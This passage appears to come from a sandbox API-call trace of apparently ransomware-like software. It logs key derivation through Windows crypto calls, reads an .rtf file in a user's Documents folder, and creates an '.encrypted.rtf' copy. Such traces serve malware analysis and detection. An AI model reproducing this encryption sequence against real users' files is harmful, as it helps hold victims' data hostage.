lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.069] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.069] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.069] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.069] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.069] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.075] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.075] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.075] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.075] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.075] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.076] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.076] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.076] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0035.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.076] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\mtggv.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.076] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.076] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.076] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.077] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.077] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.077] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.077] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.077] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c56a0 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0035.078] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k")) returned 0x10 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c56a0 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.078] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.078] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\mtggv.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0035.080] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.080] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.080] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.080] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x4284, lpOverlapped=0x0) returned 1 [0035.081] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4284) returned 0x955018 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4284) returned 0x9592a8 [0035.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4284) returned 0x955018 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.084] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.084] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.084] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4284) returned 0x955018 [0035.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0035.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0035.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4284) returned 0x95d538 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.087] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.087] PeekMessageW (in: 